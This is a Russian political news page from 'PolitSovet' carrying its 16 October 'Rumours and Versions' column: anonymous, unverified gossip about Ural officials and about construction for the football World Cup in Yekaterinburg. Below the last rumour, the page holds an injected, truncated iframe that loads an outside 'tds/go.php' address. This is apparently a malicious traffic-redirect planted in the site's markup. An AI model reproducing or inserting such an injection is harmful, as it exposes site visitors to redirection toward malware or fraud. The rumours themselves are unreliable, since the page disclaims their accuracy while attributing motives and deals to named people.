Слухи сайта «ПолитСовет»

Редакция сайта «ПолитСовет» не несет никакой ответственности за достоверность информации, изложенной в рубрике «Слухи и Версии». Сами слухи присылаются нам нашими читателями и содержат их точку зрения на события, происходящие в политической жизни Урала и России.
Если Вы обладаете подобной информацией, присылайте свои материалы по адресу sluhi@politsovet.ru с пометкой «Слухи и Версии».

Слухи и версии, 16 октября

Николай Винниченко может получить свой «скандал с резиденцией»
Говорят, что полпред президента на Урале Николай Винниченко может получить свой «скандал с резиденцией полпреда». По неофициальной информации, ситуация со строительством помпезного дворца в центре Екатеринбурга может повернуться таким образом, что именно Винниченко придется отбиваться от упреков общественности в расточительстве, хотя общеизвестно, что проект был начат еще при его предшественнике, покойном Петре Латышеве.
Как уверяют слухмейкеры, о спонтанности развития темы речи при этом не идет, а к критическому PR-проекту имеют самое прямое отношение люди, которые вели тему «полпреда-барина» девять лет назад, когда Латышеву приписали желание отобрать под резиденцию Дворец детского творчества на Вознесенской горке.
Эдуарду Росселю предложили возглавить областной парламент
Говорят, что одним из вариантов трудоустройства Эдуарда Росселя после ухода с должности главы региона может стать кресло председателя областного парламента. По неофициальной информации, такое предложение ему озвучили граждане, представляющиеся представителями «Москвы».
Как уверяют слухмейкеры, одним из условий, выдвинутых упорно не желающему просто уйти на пенсию губернатору, стал его отказ от архаичной двухпалатной системы парламента. Не исключено, что в сложившейся ситуации губернатор на это наконец-то пойдет, ведь возглавить лишь одну из двух палат Эдуард Эргартович не согласится.
Александра Мишарина с нетерпением ждут дружественные коммерсанты
Говорят, что с особенным нетерпением развязки интриги с новым губернатором Свердловской области ждет часть бизнес-сообщества, когда-то плотно работавшая с Александром Мишариным в бытность его главой Свердловской железной дороги. По неофициальной информации, эти граждане рассчитывают, что бывший главный железнодорожник региона их не забыл, ведь административная поддержка может стать подспорьем в годы кризиса.
Как уверяют слухмейкеры, все соответствующие атрибуты торжественной встречи нового короля в этой связи активно готовятся.
Анатолий Гайда всех раздражает
Говорят, что председатель комитета по законодательству Свердловской областной думы Анатолий Гайда, развивший в последнее время бурную деятельность по модернизации областного устава и задумавший радикально опустить губернатора в областной табели о рангах, изрядно всем надоел. По неофициальной информации, от напора ученого чиновника подустали даже его союзники по фронде.
Как уверяют слухмейкеры, конечно, сами по себе предложения Анатолия Войцеховича пользуются популярностью и какая-то их часть, вполне возможно, будет реализована, однако сама по себе фигура «профессора» всем изрядно надоела.
Екатеринбург ждет предфутбольная строительная истерия
Говорят, что едва вышедшему из истерии ШОС-строительства Екатеринбургу грозит новая региональная сверхидея, на этот раз связанная с чемпионатом мира по футболу, принять который намерена Россия. Как уверяют слухмейкеры, федеральные власти всерьез взялись за дело и рассчитывают повторить сочинский триумф, регионы же в этой ситуации должны за год создать соответствующую футбольную инфраструктуру и облагородить город — участник чемпионата в целом.
Как уверяют слухмейкеры, в Екатеринбурге в этой связи может, наконец, закипеть работа на Центральном стадионе и все сопутствующие проекты, вот только список объектов теперь будет называться не «шосовский», а «футбольный».
<iframe src="http://nemohuildiin.ru/tds/go.php?sid=

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Ноябрь 2019    »
ПнВтСрЧтПтСбВс
 123
45678910
11121314151617
18192021222324
252627282930 

Контакты